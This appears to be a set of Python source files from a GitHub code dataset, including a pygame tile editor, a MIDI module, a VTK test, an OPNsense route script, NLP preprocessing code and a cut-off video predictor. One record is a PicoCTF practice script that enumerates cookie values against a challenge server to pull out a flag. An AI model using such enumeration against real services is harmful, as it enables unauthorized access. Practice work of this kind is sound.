enumerate(lower_button_list):\n if i.draw(screen):\n current_tile = button_count\n\n # highlight the selected tile\n pygame.draw.rect(screen, RED, lower_button_list[current_tile].rect, 3)\n\n # decor layer tiles\n elif layer == 'decor':\n button_count = 0\n for button_count, i in enumerate(decor_button_list):\n if i.draw(screen):\n current_tile = button_count\n\n # highlight the selected tile\n pygame.draw.rect(screen, RED, decor_button_list[current_tile].rect, 3)\n\n # decor layer tiles\n elif layer == 'upper':\n button_count = 0\n for button_count, i in enumerate(upper_button_list):\n if i.draw(screen):\n current_tile = button_count\n\n # highlight the selected tile\n pygame.draw.rect(screen, RED, upper_button_list[current_tile].rect, 3)\n\n # scroll the map\n if scroll_left and scroll[0] > 0:\n scroll[0] -= 5 * scroll_speed\n if scroll[0] < 0:\n scroll[0] = 0\n if scroll_right and scroll[0] < (COLS * TILE_SIZE) - SCREEN_WIDTH:\n scroll[0] += 5 * scroll_speed\n if scroll[0] > (COLS * TILE_SIZE) - SCREEN_WIDTH:\n scroll[0] = (COLS * TILE_SIZE) - SCREEN_WIDTH\n if scroll_up and scroll[1] > 0:\n scroll[1] -= 5 * scroll_speed\n if scroll[1] < 0:\n scroll[1] = 0\n if scroll_down and scroll[1] < (ROWS * TILE_SIZE) - SCREEN_HEIGHT:\n scroll[1] += 5 * scroll_speed\n if scroll[1] > (ROWS * TILE_SIZE) - SCREEN_HEIGHT:\n scroll[1] = (ROWS * TILE_SIZE) - SCREEN_HEIGHT\n\n # add new tiles to the screen\n # get mouse position\n pos = pygame.mouse.get_pos()\n x = (pos[0] + scroll[0]) // TILE_SIZE\n y = (pos[1] + scroll[1]) // TILE_SIZE\n\n # check that the coordinates are within the tile area\n if pos[0] < SCREEN_WIDTH and pos[1] < SCREEN_HEIGHT:\n # update tile value\n if layer == 'lower':\n if pygame.mouse.get_pressed()[0] == 1:\n if lower_world_data[y][x] != current_tile:\n lower_world_data[y][x] = current_tile\n if pygame.mouse.get_pressed()[2] == 1:\n lower_world_data[y][x] = -1\n elif layer == 'decor':\n if pygame.mouse.get_pressed()[0] == 1:\n if decor_world_data[y][x] != current_tile:\n decor_world_data[y][x] = current_tile\n if pygame.mouse.get_pressed()[2] == 1:\n decor_world_data[y][x] = -1\n elif layer == 'upper':\n if pygame.mouse.get_pressed()[0] == 1:\n if upper_world_data[y][x] != current_tile:\n upper_world_data[y][x] = current_tile\n if pygame.mouse.get_pressed()[2] == 1:\n upper_world_data[y][x] = -1\n\n # event handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n # keyboard presses\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n level += 1\n save_trigger = 0\n if event.key == pygame.K_DOWN and level > 1:\n level -= 1\n save_trigger = 0\n if event.key == pygame.K_a:\n scroll_left = True\n if event.key == pygame.K_d:\n scroll_right = True\n if event.key == pygame.K_w:\n scroll_up = True\n if event.key == pygame.K_s:\n scroll_down = True\n if event.key == pygame.K_LSHIFT:\n scroll_speed = 5\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_a:\n scroll_left = False\n if event.key == pygame.K_d:\n scroll_right = False\n if event.key == pygame.K_w:\n scroll_up = False\n if event.key == pygame.K_s:\n scroll_down = False\n if event.key == pygame.K_LSHIFT:\n scroll_speed = 1\n\n pygame.display.update()\n\npygame.quit()\n","repo_name":"Araime/dungeon-wars-editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74266288874","text":"\"\"\"Support for event streams, messages, instruments, MIDI devices, and MIDI files.\n\nThis module includes functions for working with MIDI devices and files,\nbut it also describes a basic interface for _events_ and _instruments_\nwhich is useful even if you don't care about MIDI itself.\n\nA event consists of some data; for example, a typical MIDI message like `Message(type='note_on', note=60, velocity=100)`.\nThe important thing is that events do not include timing information. Instead, the timing is inherent in the event stream.\nEvent streams consist of tuples of events. The timestamp of an event is given by its position in the stream.\nAt any point in the stream, multiple events may occur simultaneously (tuple of length > 1), or no events may occur (empty tuple).\n\nBecause event streams yield tuples, they may be composed in parallel by addition:\n`event_stream_a + event_stream_b` creates a combined event stream with all the events from both.\n\nAn _instrument_ is any function that takes an event stream and returns a sample stream.\n\nExample usage:\nplay(midi.poly_instrument(midi.input_stream()))\n\"\"\"\nimport mido\n\nfrom aleatora.streams.core import FunctionStream\n\nfrom .streams import const, events_in_time, frame, m2f, osc, ramp, repeat, SAMPLE_RATE, stream\n\nget_input_names = mido.get_input_names\n\n# This is used interchangably with mido.Message, which (true to MIDI) doesn't allow float vlaues.\n# (Would use a namedtuple, but they lacks `defaults` in the version of PyPy I'm using.)\nclass Message:\n def __init__(self, type, note, velocity=None):\n self.type = type\n self.note = note\n self.velocity = velocity\n \n def __repr__(self):\n return f\"Message({self.type}, {self.note}, {self.velocity})\"\n\ndef input_stream(port=None):\n if port is None:\n port = get_input_names()[-1]\n if isinstance(port, str):\n port = mido.open_input(port)\n return repeat(lambda: tuple(port.iter_pending()))\n\n@stream\ndef load(filename, include_meta=False):\n simultaneous = []\n delta = 0\n for message in mido.MidiFile(filename):\n delta += message.time * SAMPLE_RATE\n if int(delta) > 0:\n yield tuple(simultaneous)\n delta -= 1\n yield from const(())[:int(delta)]\n delta -= int(delta)\n simultaneous = []\n if not message.is_meta or include_meta:\n simultaneous.append(message)\n\ndef save(stream, filename, rate=None, bpm=120):\n if rate is None:\n rate = SAMPLE_RATE\n mid = mido.MidiFile()\n track = mido.MidiTrack()\n mid.tracks.append(track)\n t = 0\n for messages in stream:\n for message in messages:\n if not isinstance(message, mido.Message):\n message = mido.Message(message.type, note=int(message.note), velocity=int(message.velocity or 0))\n message.time = int(t)\n t -= int(t)\n track.append(message)\n t += 1/rate * (bpm / 60) * mid.ticks_per_beat\n mid.save(filename)\n\n# Instruments take a stream of tuples of MIDI-style messages\n# (objects with `type`, `note`, `velocity`) and produce a stream of samples.\n# Instruments may persist (continue streaming even when they are only producing silence) or not.\n# Persisting is useful for playing an instrument for a live or indeterminate source,\n# while not persisting is useful for sequencing, or building up instruments\n# (as in converting a monophonic instrument to polyphonic).\n\n# Simple mono instrument. Acknowledges velocity, retriggers.\n@stream\ndef mono_instrument(stream, freq=0, amp=0, velocity=0, waveform=osc):\n freq_stream = repeat(lambda: freq)\n waveform_iter = iter(waveform(freq_stream))\n for events in stream:\n if not events:\n pass\n elif events[-1].type == 'note_on':\n freq = m2f(events[-1].note)\n velocity = events[-1].velocity\n elif events[-1].type == 'note_off':\n velocity = 0\n target_amp = velocity / 127\n if amp > target_amp:\n amp = max(target_amp, amp - 1e-4)\n else:\n amp = min(target_amp, amp + 1e-6 * velocity**2)\n yield amp * next(waveform_iter)\n while amp > 0:\n if amp > target_amp:\n amp = max(target_amp, amp - 1e-4)\n else:\n amp = min(target_amp, amp + 1e-6 * velocity**2)\n yield amp * next(waveform_iter)\n\n# Convert a monophonic instrument into a polyphonic instrument.\ndef make_poly(monophonic_instrument, persist_internal=False):\n # Provides a 'substream' of messages for a single voice in a polyphonic instrument.\n def make_event_substream():\n @FunctionStream\n def substream():\n while substream.last_event is None:\n yield substream.events\n yield (substream.last_event,)\n substream.events = ()\n substream.last_event = None\n return substream\n\n @stream\n def polyphonic_instrument(stream, **kwargs):\n substreams = {}\n voices = []\n for events in stream:\n acc = 0\n # Clear old messages:\n for substream in substreams.values():\n substream.events = ()\n for event in events:\n if event.type == 'note_on':\n if event.note in substreams:\n # Retrigger existing voice\n substreams[event.note].events = (event,)\n else:\n # New voice\n substream = make_event_substream()\n substream.events = (event,)\n substreams[event.note] = substream\n voices.append(iter(monophonic_instrument(substream, **kwargs)))\n elif event.type == 'note_off':\n if event.note in substreams:\n if persist_internal:\n substreams[event.note].events = (event,)\n else:\n substreams[event.note].last_event = event\n del substreams[event.note]\n\n for i in range(len(voices) - 1, -1, -1):\n try:\n sample = next(voices[i])\n acc += sample\n except StopIteration:\n del voices[i]\n yield acc\n while voices:\n acc = 0\n for i in range(len(voices) - 1, -1, -1):\n try:\n sample = next(voices[i])\n acc += sample\n except StopIteration:\n del voices[i]\n yield acc\n return polyphonic_instrument\n\n# Handy decorator version\ndef poly(monophonic_instrument=None, persist_internal=False):\n if monophonic_instrument is None:\n return lambda mi: make_poly(mi, persist_internal)\n return make_poly(monophonic_instrument, persist_internal)\n\npoly_instrument = poly(mono_instrument)\n\n# Convert stream of MIDI events into stream of notes (currently just dictionaries).\n@stream\ndef events_to_notes(event_stream, rate=None):\n if rate is None:\n rate = SAMPLE_RATE\n t = 0\n ongoing = {}\n for messages in event_stream:\n for message in messages:\n if message.type not in ('note_on', 'note_off'):\n continue\n pitch = int(message.note)\n if message.type == 'note_on' and pitch not in ongoing:\n ongoing[pitch] = (t, message.velocity)\n elif message.type == 'note_off' and pitch in ongoing:\n start, velocity = ongoing[pitch]\n yield {\"start\": start, \"end\": t, \"pitch\": pitch, \"velocity\": velocity}\n del ongoing[pitch]\n t += 1/rate\n\ndef sampler(mapping, fade=0.01):\n \"Instrument that maps MIDI pitches to streams. Resamples to account for octave jumps.\"\n def get_sample(pitch, velocity):\n gain = velocity / 127\n if pitch in mapping:\n return mapping[pitch] * gain\n # No such pitch in the mapping; see if there's one in the same pitch class (offset by octaves).\n for m, s in mapping.items():\n if (pitch - m) % 12 == 0:\n return s.resample(2**((pitch - m)/12)) * gain\n\n @poly\n @stream\n def instrument(stream):\n it = iter([])\n for events in stream:\n if events:\n if events[-1].type == 'note_on':\n it = iter(get_sample(events[-1].note, events[-1].velocity) * ramp(0, 1, fade, True))\n elif events[-1].type == 'note_off':\n yield from ramp(1, 0, fade) * it\n return\n try:\n yield next(it)\n except StopIteration:\n return\n yield from it\n return instrument\n\n\n@stream\ndef soundfont(event_stream, preset=0, chunk_size=1024, path=\"/usr/share/sounds/sf2/default-GM.sf2\"):\n try:\n import fluidsynth\n except ImportError as exc:\n raise ImportError(f\"Missing optional dependency '{exc.name}'. Install via `python -m pip install {exc.name}`.\")\n\n # NOTE: Currently, this sets up the synth when the stream starts.\n # This might(?) be slow, especially for short cycled streams, but it guarantees fresh synth state upon replay.\n # (If you don't want a fresh synth state, cycle `event_stream` rather than this stream.)\n fs = fluidsynth.Synth()\n sfid = fs.sfload(path)\n fs.program_select(0, sfid, 0, preset)\n\n for chunk in event_stream.chunk(chunk_size):\n for events in chunk:\n for event in events:\n channel = getattr(event, \"channel\", 0)\n if event.type == 'note_on':\n fs.noteon(channel, int(event.note), event.velocity)\n elif event.type == 'note_off':\n fs.noteoff(channel, int(event.note))\n elif event.type == 'control_change':\n fs.cc(channel, event.control, event.value)\n elif event.type == 'program_change':\n fs.program_change(channel, event.program)\n yield from map(frame, fs.get_samples(chunk_size).reshape((-1, 2)) / (2**15-1))\n\n fs.delete()\n","repo_name":"ijc8/aleatora","sub_path":"src/aleatora/midi.py","file_name":"midi.py","file_ext":"py","file_size_in_byte":10194,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"9043916409","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\nmath = vtk.vtkMath()\nmath.RandomSeed(22)\n\nsphere = vtk.vtkSphereSource()\nsphere.SetPhiResolution(32)\nsphere.SetThetaResolution(32)\n\nextract = vtk.vtkExtractPolyDataPiece()\nextract.SetInputConnection(sphere.GetOutputPort())\n\nnormals = vtk.vtkPolyDataNormals()\nnormals.SetInputConnection(extract.GetOutputPort())\n\nps = vtk.vtkPieceScalars()\nps.SetInputConnection(normals.GetOutputPort())\n\nmapper = vtk.vtkPolyDataMapper()\nmapper.SetInputConnection(ps.GetOutputPort())\nmapper.SetNumberOfPieces(2)\n\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\n\nsphere2 = vtk.vtkSphereSource()\nsphere2.SetPhiResolution(32)\nsphere2.SetThetaResolution(32)\n\nextract2 = vtk.vtkExtractPolyDataPiece()\nextract2.SetInputConnection(sphere2.GetOutputPort())\n\nmapper2 = vtk.vtkPolyDataMapper()\nmapper2.SetInputConnection(extract2.GetOutputPort())\nmapper2.SetNumberOfPieces(2)\nmapper2.SetPiece(1)\nmapper2.SetScalarRange(0, 4)\nmapper2.SetScalarModeToUseCellFieldData()\nmapper2.SetColorModeToMapScalars()\nmapper2.ColorByArrayComponent(vtk.vtkDataSetAttributes.GhostArrayName(), 0)\nmapper2.SetGhostLevel(4)\n\n# check the pipeline size\nextract2.UpdateInformation()\npsize = vtk.vtkPipelineSize()\nif (psize.GetEstimatedSize(extract2, 0, 0) > 100):\n print (\"ERROR: Pipeline Size increased\")\n pass\nif (psize.GetNumberOfSubPieces(10, mapper2) != 1):\n print (\"ERROR: Number of sub pieces changed\",\n psize.GetNumberOfSubPieces(10, mapper2))\n pass\n\nactor2 = vtk.vtkActor()\nactor2.SetMapper(mapper2)\nactor2.SetPosition(1.5, 0, 0)\n\nsphere3 = vtk.vtkSphereSource()\nsphere3.SetPhiResolution(32)\nsphere3.SetThetaResolution(32)\n\nextract3 = vtk.vtkExtractPolyDataPiece()\nextract3.SetInputConnection(sphere3.GetOutputPort())\n\nps3 = vtk.vtkPieceScalars()\nps3.SetInputConnection(extract3.GetOutputPort())\n\nmapper3 = vtk.vtkPolyDataMapper()\nmapper3.SetInputConnection(ps3.GetOutputPort())\nmapper3.SetNumberOfSubPieces(8)\nmapper3.SetScalarRange(0, 8)\n\nactor3 = vtk.vtkActor()\nactor3.SetMapper(mapper3)\nactor3.SetPosition(0, -1.5, 0)\n\nsphere4 = vtk.vtkSphereSource()\nsphere4.SetPhiResolution(32)\nsphere4.SetThetaResolution(32)\n\nextract4 = vtk.vtkExtractPolyDataPiece()\nextract4.SetInputConnection(sphere4.GetOutputPort())\n\nps4 = vtk.vtkPieceScalars()\nps4.RandomModeOn()\nps4.SetScalarModeToCellData()\nps4.SetInputConnection(extract4.GetOutputPort())\n\nmapper4 = vtk.vtkPolyDataMapper()\nmapper4.SetInputConnection(ps4.GetOutputPort())\nmapper4.SetNumberOfSubPieces(8)\nmapper4.SetScalarRange(0, 8)\n\nactor4 = vtk.vtkActor()\nactor4.SetMapper(mapper4)\nactor4.SetPosition(1.5, -1.5, 0)\n\nren = vtk.vtkRenderer()\nren.AddActor(actor)\nren.AddActor(actor2)\nren.AddActor(actor3)\nren.AddActor(actor4)\n\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\n\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\niren.Initialize()\n#iren.Start()\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Parallel/Core/Testing/Python/TestPolyDataPieces.py","file_name":"TestPolyDataPieces.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"10623675310","text":"import subprocess\nimport sys\nimport ujson\n\nif __name__ == '__main__':\n result = []\n fieldnames=[]\n if '-n' in sys.argv:\n resolv = 'n'\n else:\n resolv = ''\n sp = subprocess.run(['/usr/bin/netstat', '-rW' + resolv], capture_output=True, text=True)\n current_proto = \"\"\n for line in sp.stdout.split(\"\\n\"):\n fields = line.split()\n if len(fields) == 0:\n continue\n elif len(fields) == 1 and fields[0] == 'Internet:':\n current_proto = 'ipv4'\n elif len(fields) == 1 and fields[0] == 'Internet6:':\n current_proto = 'ipv6'\n elif len(fields) > 2 and fields[0] == 'Destination' and fields[1] == 'Gateway':\n fieldnames = list(map(lambda x : x.lower(), fields))\n elif len(fields) > 2:\n record = {'proto': current_proto}\n for fieldid in range(len(fields)):\n if len(fieldnames) > fieldid:\n record[fieldnames[fieldid]] = fields[fieldid]\n # space out missing fields\n for fieldname in fieldnames:\n if fieldname not in record:\n record[fieldname] = \"\"\n result.append(record)\n\n # handle command line argument (type selection)\n if len(sys.argv) > 1 and 'json' in sys.argv:\n print(ujson.dumps(result))\n else:\n # output plain\n print ('\\t\\t'.join(fieldnames))\n frmt = \"%(proto)s\\t\"\n for fieldname in fieldnames:\n frmt = frmt + \"%(\"+fieldname+\")s\\t\"\n for record in result:\n print (frmt%record)\n","repo_name":"opnsense/core","sub_path":"src/opnsense/scripts/routes/show_routes.py","file_name":"show_routes.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":2702,"dataset":"github-code","pt":"72"} +{"seq_id":"28196772989","text":"import re\nimport requests\n\nurl = \"http://mercury.picoctf.net:21485/check\"\n\n\nfor i in range(50):\n cookies = {\n \"name\": str(i)\n }\n response = requests.get(url, cookies=cookies)\n\n if \"Not very special\" not in response.text:\n flag = re.findall(\"picoCTF{.*}\", response.text)[0]\n print(flag)\n exit(0)\n","repo_name":"CavemanJay/PicoCTF","sub_path":"practice/cookies_COMPLETE/get_flag.py","file_name":"get_flag.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10168833964","text":"from typing import Optional, Union\n\nimport torch\nfrom transformers.tokenization_utils_base import PreTrainedTokenizerBase\nfrom transformers.utils import PaddingStrategy\n\n\nclass CombinedDataCollator:\n def __init__(\n self,\n tokenizer: PreTrainedTokenizerBase,\n padding: Union[bool, str, PaddingStrategy] = True,\n max_length: Optional[int] = None,\n ):\n self.tokenizer = tokenizer\n self.padding = padding\n self.max_length = max_length\n\n def __call__(self, features):\n\n sent_label = tuple(feature.pop(\"sent_label\") for feature in features)\n\n # Conversion to tensors will fail if we have labels\n # as they are not of the same length yet.\n batch = self.tokenizer.pad(\n features,\n padding=self.padding,\n max_length=self.max_length,\n )\n\n labels = tuple(tuple(feature[\"labels\"]) for feature in features)\n\n sequence_length = len(batch[\"input_ids\"][0])\n\n paddings = tuple((-100,) * (sequence_length - len(label)) for label in labels)\n\n batch[\"labels\"] = (\n [label + padding for label, padding in zip(labels, paddings)]\n if self.tokenizer.padding_side == \"right\"\n else [padding + label for label, padding in zip(labels, paddings)]\n )\n\n batch[\"sent_label\"] = sent_label\n\n # Convert to tensor now\n batch = {k: torch.as_tensor(v, dtype=torch.int64) for k, v in batch.items()}\n\n return batch\n","repo_name":"naamiinepal/IPV-detection","sub_path":"lightning_modules/datamodules/combined_data_collator.py","file_name":"combined_data_collator.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24202448298","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sponsors', '0004_auto_20150726_1412'),\n ('core', '0005_auto_20150726_1416'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='HomePageSponsorRelationship',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('homepage', models.ForeignKey(to='core.HomePage')),\n ('level', models.ForeignKey(to='sponsors.SponsorshipLevel')),\n ('sponsor', models.ForeignKey(to='sponsors.Sponsor')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"gitdaniel228/website","sub_path":"pythonie/core/migrations/0006_homepagesponsorrelationship.py","file_name":"0006_homepagesponsorrelationship.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20925205336","text":"import numpy as np\nimport pandas as pd\nimport jieba\nimport re\nimport random\nfrom config import *\nfrom collections import Counter\nfrom multicore import parallelize\nfrom file_utils import save_dict\nfrom gensim.models.word2vec import LineSentence\nfrom gensim.models import word2vec\nimport gensim\n\nimport logging\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n######################################################################################################\n### Part 0. Utility functions for load processed data \n######################################################################################################\ndef load_train_dataset(max_enc_len, max_dec_len):\n \"\"\"\n :return: load processed training data\n \"\"\"\n train_X = np.load(train_x_path + '.npy')\n train_Y = np.load(train_label_path + '.npy')\n\n train_X = train_X[:, :max_enc_len]\n train_Y = train_Y[:, :max_dec_len]\n return train_X, train_Y\n\n\ndef load_test_dataset(max_enc_len=200):\n \"\"\"\n :return: load processed test data\n \"\"\"\n test_X = np.load(test_x_path + '.npy')\n test_X = test_X[:, :max_enc_len]\n return test_X\n\n######################################################################################################\n### Part I. Utility functions for preprocessing data \n######################################################################################################\ndef load_data(train_data_path, test_data_path):\n train_data = pd.read_csv(train_data_path, encoding='utf-8')\n test_data = pd.read_csv(train_data_path, encoding='utf-8')\n\n print('train data size {},test data size {}'.format(len(train_data), len(test_data)))\n\n train_data.dropna(subset = ['Report'], inplace = True)\n\n train_data.fillna('', inplace = True)\n test_data.fillna('', inplace = True)\n\n return train_data.iloc[:30,:], test_data.iloc[:30, :]\n\n\ndef clean_data(sentence):\n if isinstance(sentence, str):\n return re.sub(\n r'[\\s+\\-\\|\\!\\/\\[\\]\\{\\}_,$%^*(+\\\"\\')]+|[::+——()?【】~@#¥%……&*()]+|车主说|技师说|语音|图片',\n '', sentence)\n else:\n return ''\n\n\ndef tokenize(sentence):\n stopwords = load_stopwords(stopwords_path)\n return ' '.join([word for word in jieba.lcut(sentence) if word not in stopwords])\n\n\ndef process_sentence(sentence):\n sentence = clean_data(sentence)\n\n sentence = tokenize(sentence)\n return sentence\n\n\ndef dataframe_process(data):\n \n for column in ['Question', 'Dialogue']:\n data[column] = data[column].apply(process_sentence)\n \n if 'Report' in data.columns:\n data['Report'] = data['Report'].apply(process_sentence)\n \n return data\n\ndef load_stopwords(stopwords_path):\n with open(stopwords_path, 'r') as file:\n lines = file.readlines()\n \n stopwords = [line.strip() for line in lines]\n return stopwords\n\n\n######################################################################################################\n### Part II. Utility functions building word embeddings\n######################################################################################################\ndef vocab_index_dict(merged_data):\n '''\n generate vocab-index pair\n merged_data: string with words separated by ' '\n '''\n word_list = merged_data.split()\n word_counts = Counter(word_list)\n vocab_list = sorted(word_counts.items(), key = lambda x: x[1], reverse = True)\n vocab_list = [(vocab_list[i][0], i+1) for i in range(len(vocab_list))]\n\n vocab_to_index = dict(vocab_list)\n\n index_word_list = [(item[1], item[0]) for item in vocab_list]\n index_to_vocab = dict(index_word_list)\n return vocab_to_index, index_to_vocab\n\ndef train_w2v_embeddings(data_path, model_path):\n model = word2vec.Word2Vec(LineSentence(data_path), workers=8, min_count=5, size=200)\n model.save(model_path)\n return model\n\n\ndef build_embedding_matrix(model):\n '''\n using word2vec index2word list, which is a list of string(word)\n '''\n embedding_dim = model.wv.vector_size\n vocab_size = len(model.wv.vocab)\n \n embedding_matrix = np.zeros((vocab_size, embedding_dim))\n for i in range(vocab_size):\n embedding_matrix[i, :] = model.wv[model.wv.index2word[i]]\n embedding_matrix = embedding_matrix.astype('float32')\n \n np.savetxt('save_embedding_matrix_path', embedding_matrix, fmt='%0.8f')\n print('embedding matrix extracted')\n return embedding_matrix\n\ndef build_embedding_matrix_direct(model):\n '''\n get embedding matrix directly from the model\n '''\n return model.wv.vectors\n\ndef get_max_len(sentences):\n '''\n sentences: Series object\n '''\n lens = sentences.str.count(' ')+1\n return lens.mean() + 2 * lens.std()\n\ndef pad_sentence(x, x_max_len, vocab):\n '''\n fill in \n '''\n tokens = [token if token in vocab else '' for token in x.strip().split()]\n tokens = tokens[: x_max_len]\n\n padded_tokens = [''] + tokens + ['']\n padded_sentence = padded_tokens + [''] * (x_max_len - len(tokens))\n return ' '.join(padded_sentence)\n\n\ndef transform(sentence, vocab_to_index):\n '''\n re-represent the sentence using token indices\n '''\n tokens = sentence.strip().split()\n return [vocab_to_index[token] if token in vocab_to_index.keys() else vocab_to_index[''] for token in tokens]\n\n\ndef build_dataset(train_data_path, test_data_path):\n\n # 1. load data\n train_data, test_data = load_data(train_data_path, test_data_path)\n\n jieba.load_userdict(user_dict)\n\n # 2. parallelize\n train_data = parallelize(train_data, dataframe_process)\n test_data = parallelize(test_data, dataframe_process)\n \n # 3. save train/test data\n train_data.to_csv(processed_train_data_path, index = None, header = True)\n test_data.to_csv(processed_test_data_path, index = None, header = True)\n\n\n # 4. save merged data\n train_data['merged'] = train_data[['Question', 'Dialogue', 'Report']].apply(lambda x: ' '.join(x), axis = 1)\n test_data['merged'] = train_data[['Question', 'Dialogue']].apply(lambda x: ' '.join(x), axis = 1)\n merged_data = pd.concat([train_data['merged'], test_data['merged']], axis = 0)\n print('train data size {},test data size {},merged_df data size {}'.format(len(train_data),\n len(test_data),\n len(merged_data)))\n\n merged_data.to_csv(merged_data_path, index = None, header = True)\n\n # home-made vocab_index_dict\n # vocab_to_index, index_to_vocab = vocab_index_dict(merged_data)\n\n # 5. # train model and build embedding matrix\n # # NOTE: gensim library builds the vocab list in an descending order of frequency\n model = train_w2v_embeddings(merged_data_path, word2vec_model_path)\n embedding_matrix = build_embedding_matrix_direct(model)\n print('embedding matrix shape: {}'.format(embedding_matrix.shape))\n\n index_to_vocab = {index:word for index, word in enumerate(model.wv.index2word)}\n vocab_to_index = {word:index for index, word in enumerate(model.wv.index2word)}\n\n # 6. separate input data and labels\n train_data['X'] = train_data[['Question', 'Dialogue']].apply(lambda x: ' '.join(x), axis = 1)\n test_data['X'] = test_data[['Question', 'Dialogue']].apply(lambda x: ' '.join(x), axis = 1)\n\n # 7. padding \n # input sentences processing\n vocab = model.wv.vocab\n train_x_max_len = get_max_len(train_data['X'])\n test_x_max_len = get_max_len(test_data['X'])\n x_max_len = max(train_x_max_len, test_x_max_len)\n train_data['X'] = train_data['X'].apply(lambda x: pad_sentence(x, x_max_len, vocab))\n test_data['X'] = test_data['X'].apply(lambda x: pad_sentence(x, x_max_len, vocab))\n\n # label sentences (report) processing\n train_label_max_len = get_max_len(train_data['Report'])\n train_data['Y'] = train_data['Report'].apply(lambda x: pad_sentence(x, train_label_max_len, vocab))\n\n\n # 8. save padded data for word2vec model retraining\n train_data['X'].to_csv(train_x_pad_path, index=None, header=False)\n train_data['Y'].to_csv(train_label_pad_path, index=None, header=False)\n test_data['X'].to_csv(test_x_pad_path, index=None, header=False)\n\n # 9. retrain\n print('start retraining word2vec model...')\n model.build_vocab(LineSentence(train_x_pad_path), update = True)\n model.train(LineSentence(train_x_pad_path), epochs = 1, total_examples = model.corpus_count)\n print('progressing 1/3.')\n\n model.build_vocab(LineSentence(test_x_pad_path), update = True)\n model.train(LineSentence(test_x_pad_path), epochs = 1, total_examples = model.corpus_count)\n print('progressing 2/3.')\n\n model.build_vocab(LineSentence(train_label_pad_path), update = True)\n model.train(LineSentence(train_label_pad_path), epochs = 1, total_examples = model.corpus_count)\n print('finish retraining.')\n\n # 10. update vocab_to_index and index_to_vocab\n vocab_to_index = {token: index for index, token in enumerate(model.wv.index2word)}\n index_to_vocab = {index: token for index, token in enumerate(model.wv.index2word)}\n\n # 11. save results\n model.save(word2vec_model_path)\n print('final word2vec model has a vocabulary of size ', len(model.wv.vocab))\n\n save_dict(vocab_to_index, vocab_to_index_path)\n save_dict(index_to_vocab, index_to_vocab_path)\n\n embedding_matrix = model.wv.vectors\n np.save(embedding_matrix_path, embedding_matrix)\n\n # 12. transform sentence to index sequence\n train_x_index_seq = train_data['X'].apply(lambda x: transform(x, vocab_to_index))\n test_x_index_seq = test_data['X'].spply(lambda x: transform(x, vocab_to_index))\n\n train_label_index_seq = train_data['Y'].apply(lambda x: transform(x, vocab_to_index))\n\n # save reaults\n np.save(train_x_path, train_x_index_seq)\n np.save(test_x_path, test_x_index_seq)\n np.save(train_label_path, train_label_index_seq)\n\n return train_x_index_seq, train_label_index_seq, test_x_index_seq\n\n\n\n\nif __name__ == '__main__':\n build_dataset(train_data_path, test_data_path)","repo_name":"rachelduan/AbstractGeneration","sub_path":"utils/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":10210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26288734466","text":"import pygame\nfrom pygame.sprite import Group\n\nimport game_functions as gf\n\nfrom settings import Settings\nfrom ship import Ship\n\n\ndef run_game():\n # 初始化游戏并创建一个屏幕对象\n pygame.init()\n ai_settings = Settings()\n screen = pygame.display.set_mode((ai_settings.screen_width, ai_settings.screen_height))\n pygame.display.set_caption(\"外星人入侵\")\n\n ship = Ship(ai_settings, screen)\n bullets = Group()\n\n while True:\n gf.check_events(ship, ai_settings, screen, bullets)\n ship.update()\n bullets.update()\n\n # 删除已经消失的子弹\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n gf.update_screen(ai_settings, screen, ship, bullets)\n\n\nrun_game()\n","repo_name":"Gzzccc/pygame-alien","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7002900336","text":"import os\nimport cv2\nimport xlsxwriter\n\nfrom ImgPredictor import ImgPredictor\nfrom root_dir import DATA_DIR\nfrom utils.vpa_utils import avg_list\nfrom utils.project_utils import *\n\n\nclass VideoPredictor(object):\n\n def __init__(self):\n pass\n\n def init_vid(self, vid_path):\n \"\"\"\n 初始化视频\n \"\"\"\n cap = cv2.VideoCapture(vid_path)\n n_frame = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n fps = int(cap.get(cv2.CAP_PROP_FPS)) # 26\n\n w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n 